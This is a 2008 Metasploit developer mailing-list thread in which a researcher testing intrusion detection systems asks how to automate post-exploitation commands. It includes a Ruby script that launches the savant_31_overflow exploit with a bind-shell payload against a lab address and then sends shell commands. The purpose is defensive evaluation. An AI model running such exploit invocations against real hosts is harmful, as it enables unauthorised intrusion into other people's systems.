Hi,
I am working on IDS evaluation against attack scenarios (which result
from executing "attack tools" such as exploits as well as normal
commands (e.g., ls, rm, etc.)
I want to automate the process of generating attack scenarios.
Metasploit is ideal for this purpose because it contains a reasonable
number of exploits and can be extended easily to add more "attack
tools".
To automate the execution of attack scenarios, I wrote a ruby script
that executes msfcli through an IO.pipe and passes subsequent
commands for execution. The problem is that, large output from the
executed command breaks the pipe. For example, the following code
executes well until listing the files inside WINNT: (I tried
increasing the buffer length but no way)
msfcli = path+"/" +"msfcli windows/http/savant_31_overflow
payload=windows/shell/bind_tcp RHOST=192.168.1.2 E"
pipe = IO.popen(msfcli, 'w+' )
pipe.sync = true
puts pipe.sysread(1024)
pipe.syswrite "dir\n"
puts pipe.sysread(1024)
pipe.syswrite "cd ..\n"
puts pipe.sysread(1024)
pipe.syswrite "cd winnt\n"
puts pipe.sysread(2048)
Do am I in the right direction? Or there is another way to this
directly with metasploit own stuff?
Thanks,
Masgad
On Wed, Oct 22, 2008 at 8:58 PM, M. GAD <[EMAIL PROTECTED]> wrote:
> I am sorry, I forgot passing my icq number (452697533)
>
> On Wed, Oct 22, 2008 at 3:45 PM, M. GAD <[EMAIL PROTECTED]> wrote:
>> Ok,
>> U can join me on icq as Masgad
>>
>>
>> On Wed, Oct 22, 2008 at 3:16 PM, max moser <[EMAIL PROTECTED]> wrote:
>>> Hi do you got an icq / im / skype? Its faster than email.
>>>
>>> My work is doing it based on meterpreter and the whole automation of it.
>>>
>>> max
>>>
>>> On Oct 22, 2008, at 2:51 PM, M. GAD wrote:
>>>
>>>> Hi Max
>>>> It is a good news to find someone out there sharing the same interest.
>>>> However, I am afraid that we waste our time doing the same stuff cause
>>>> me too, I did some stuff.
>>>> If you agree, we can launch a common project on this issue.
>>>>
>>>> Have a nice day,
>>>> MG
>>>>
>>>>
>>>> On Wed, Oct 22, 2008 at 1:01 PM, max moser <[EMAIL PROTECTED]> wrote:
>>>>>
>>>>> Hi there,
>>>>>
>>>>> i am in te process of writeup a howto on this one as well as contributing
>>>>> a
>>>>> lot of stuff back to the project. I did most of the stuff you mentioned
>>>>> allready.
>>>>>
>>>>> Greetings
>>>>>
>>>>> max
>>>>>
>>>>> On Oct 22, 2008, at 12:33 PM, M. GAD wrote:
>>>>>
>>>>>> Hi all
>>>>>> I need your advice/help on the implementation of a new metasploit
>>>>>> module.
>>>>>> The idea is that we are sometimes interested not only in breaking
>>>>>> (penetrating) into systems but also we are interested in post-access
>>>>>> actions, which can be very significant for security analysis or
>>>>>> evaluation (statefull or behavior-based IDSes by example).
>>>>>>
>>>>>> Metasploit already contains "access" actions as well as other usefull
>>>>>> auxiliary tools of attack (e.g., Dos, scanners, etc). So, I thought to
>>>>>> extend metasploit framework by a new module to imitate (and automate)
>>>>>> post-access actions that can probably be carried out by attackers. For
>>>>>> example, executing a sequence of commands to browse the victim
>>>>>> machine, upload a piece of malwae, connect back to another machine,
>>>>>> etc.
>>>>>> The advantage in metasploit is that it contains all what we need to
>>>>>> carry out such actions but the question is how to automate it. I know
>>>>>> that autopwn is an advanced step for doing this but unfortunately it
>>>>>> stops at gaining access and establishing sessions. We need to go a
>>>>>> step further in the automation.
>>>>>>
>>>>>> What is the entry point to interact with the established sessions, how
>>>>>> can we execute commands, receive and process their outputs?
>>>>>> I think Msf::Session is the key entry, right?
>>>>>>
>>>>>> Any help or suggestion for this end is highly appreciated.
>>>>>>
>>>>>> Best regards,
>>>>>> Mohammed GAD
>>>>>> _______________________________________________
>>>>>> Framework-Hackers mailing list
>>>>>> Framework-Hackers@spool.metasploit.com
>>>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>>>>
>>>>>
>>>
>>>
>>
>
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
